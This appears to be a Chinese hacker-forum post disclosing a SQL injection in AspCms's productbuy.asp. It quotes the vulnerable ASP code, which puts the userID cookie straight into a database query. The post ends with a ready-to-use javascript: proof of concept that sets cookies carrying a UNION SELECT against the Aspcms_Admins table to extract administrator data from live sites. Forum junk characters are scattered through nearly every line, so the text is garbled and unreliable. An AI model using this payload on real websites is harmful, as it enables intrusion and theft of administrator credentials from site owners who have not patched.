好久没上土司了,上来一看发现在删号名单内.....& A0 @: a# Y/ C# L% ^: T
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。$ Q+ ~. i6 t3 F, Y! N3 [; ? B' @
废话不多说,看代码:( j- ~# W) \. t0 S0 F! N
) u$ o/ U0 R) h# g9 K& l: P<%0 x6 P* n$ s2 q
" y) O/ `& {4 T* N, {
if action = "buy" then
q2 |9 |; j5 g$ @, x q0 z& D! c4 C' y$ T& ?* j) _4 `3 M
addOrder()
, `6 T8 w8 S$ z9 \5 o0 m' {: k. y2 ^) j H+ l6 E5 h# C1 \
else
7 S7 L' \: o% b( z) J0 e2 S# R! Q& ]
echoContent()
" e- D' e$ i$ ^. h& \& g1 U: O, u! g6 _ ~/ i; g* q7 e Q
end if4 |/ G5 V' C, M9 e
* q. b0 g; o8 r$ U8 z5 ~9 N
" z2 k" z' W& U
: ?1 W$ V" @/ q" a4 v2 y' z
……略过
w* M+ z, T4 `0 Y/ O
* R# ?3 {9 r- M# A
! w- y+ k; d: n( f P4 i) M) ~
$ E0 `& |. N, z- tSub echoContent()
# h% V; j8 A$ [
9 R6 {; y) A* |( K dim id
) h1 P8 y Z* T5 N3 R) C! G& i7 C( k# E5 E3 K6 g$ a6 b* M
id=getForm("id","get")
j' D9 c+ [ \9 C, M
# M1 V1 |5 n7 s2 q) c# w4 T , M! ]7 c/ p& e9 a. w/ \
2 P4 x. H ?6 Y N$ Y; c; J if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 5 I% k' F6 A' |1 V$ d9 X
% e: y7 N/ N9 F- i; y, G
H: o/ h5 ]. x& N+ Y& X
% J, |! `9 Y$ t+ w9 ` G; @ dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
6 A5 b% p# Y1 U* L8 q/ V0 k" W- Y+ |8 f Z( _2 M* [3 E, ?
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct/ `* d) _& C/ l
' @) @* j( T/ A# ~' @
Dim templatePath,tempStr
7 z; h: {0 d7 U3 \4 h) H k+ K8 u/ N9 F2 @0 G4 c% E/ Q
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
/ h% D/ R2 n( b0 V: s% B9 o2 u2 {( F7 v
7 T" [' E/ |) ~$ R7 U
/ T) G) H& a4 e set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
8 [( H" m, m9 u( X1 K5 @8 D8 z0 O% e( }: v9 z, g. e5 E
selectproduct=rsObj(0)
/ W J6 I- s7 |$ L2 x" [; x* ^2 y3 b/ `- \: \& H0 g1 u, e
/ Z9 c7 k8 C/ x/ D' O! B4 [ ?$ m4 a6 S1 ?6 t
Dim linkman,gender,phone,mobile,email,qq,address,postcode9 a4 L9 h6 {5 b( _" F- x1 S
2 Y2 M. }/ M% P, |8 n3 o if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
* f$ W" H, R, [
' A( p) n4 F) z* o1 @' F8 l if rCookie("loginstatus")=1 then : t8 X; \: ^0 n: L5 j$ V& N0 O
+ h- N. J I- d0 z# o% h
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
* J8 R4 m. C7 Q1 Z+ _8 _2 `7 A; P: H/ a5 D3 _/ y
linkman=rsObj("truename")
: k9 G1 ?/ t7 H- q$ x
( k5 h# a/ B p) d7 W9 | gender=rsObj("gender")
( t1 U: ]9 Z" ~8 K. e
; O; p: n4 X2 S. O( Z phone=rsObj("phone")/ F" n6 x( h) E& B u: D3 j& C
! X) {1 w a8 }# A
mobile=rsObj("mobile")6 W5 {0 h& [: q# f) v, h
q* } T! y0 w; k email=rsObj("email")2 _$ m1 Z' V' M0 U! E$ ]
! W, f# R) [2 j# n4 N2 l qq=rsObj("qq")7 ^# Q- I1 d5 l8 t5 u: \6 C9 E' g2 ^
* m" u* I6 s0 m, ~9 l8 q& Y
address=rsObj("address")3 T) n" k) g' o5 f: z( W+ B
. a* u* p b1 i( [( t; D1 T1 w' C
postcode=rsObj("postcode")
* i7 g7 m4 h" ~: @7 ?7 V' M) W7 f- m1 R' j; `- `
else * e! U: f c" b: b* e' E$ A/ B
$ G: B" \) i1 a2 k/ {9 t$ r
gender=1+ y7 \ M& ~5 S; `" P7 l# L6 I
$ e: S, B9 p* C6 L* [+ h) T
end if
2 @3 F2 { B0 R) {7 m" M/ o8 x) G W; k
rsObj.close()
! `4 p. m4 l/ E; Z A3 B" S
7 o6 i0 ]) [/ M' i& l; ?% D7 X7 T
7 L5 W( z- _; x+ C5 p+ |# C y. _- c) D }
with templateObj
+ }& E7 M. C2 t* f+ {
# `7 x3 N' t7 A; |+ o .content=loadFile(templatePath)
N1 v1 D2 t) y3 z. j
" `4 t8 h# l6 d9 e$ T( W5 ~& [ .parseHtml()3 P. L: L- y6 ]3 f
+ C3 k( P0 B. c1 p; U/ D .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
$ k# H9 K; Q' g0 |
7 R, h2 N, y6 `5 b .content=replaceStr(.content,"[aspcms:linkman]",linkman)
( h# \. K0 v ?. U9 D' R. J3 K4 D8 h" `7 _3 s, b
.content=replaceStr(.content,"[aspcms:gender]",gender)
' s3 C3 E2 l7 \4 g( {6 j5 e9 s+ Z1 b0 v( \" `; }
.content=replaceStr(.content,"[aspcms:phone]",phone)
( n; J2 r9 Z8 o3 [. t+ `
% t: S/ \ T: v* R+ E# j0 W .content=replaceStr(.content,"[aspcms:mobile]",mobile) / f8 x7 G$ H( {; _: G, j
; k3 |6 h/ [3 M6 B1 W .content=replaceStr(.content,"[aspcms:email]",email) ( t0 B' n; {0 p" P5 q4 ^0 _
& }& t+ i+ S; _6 E2 K
.content=replaceStr(.content,"[aspcms:qq]",qq)
) t: L2 b& A* s& U" ? p& L9 F0 y. d6 R/ }$ p1 i1 D8 h4 m. m& f; u( [- y
.content=replaceStr(.content,"[aspcms:address]",address)
9 ]- \8 m# n7 _( d6 g: S
( H0 W4 o, s3 E W6 l9 b8 `6 V- R .content=replaceStr(.content,"[aspcms:postcode]",postcode)
# W( N0 i- D% _2 E8 O" O: L7 m( Q, \; c
.parseCommon() ) r$ C% S5 m9 t4 _1 c2 @
$ F) S4 o s1 Z" b! r5 N' u
echo .content 5 |7 g% O9 i u G
% O" T7 ]% R. E* X$ w end with4 `. d" _0 V a& y) }( j
7 i4 H1 c g9 _/ S& ]' U. C( U set templateobj =nothing : terminateAllObjects, e: m" Q B& G$ R% \2 P: i& M
6 L5 u$ d9 H$ m/ Q. p# ^End Sub* [5 P& F( C3 c% c( F, A! K
漏洞很明显,没啥好说的
; A$ w% ?; M3 {0 lpoc:
( a1 W0 D+ g9 L2 e& |# [/ Z3 v. L' A2 Y* x% \ j7 }) Z& [1 m
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
5 k( e3 o+ r9 l" l9 i
5 a/ d; C' d+ q2 B |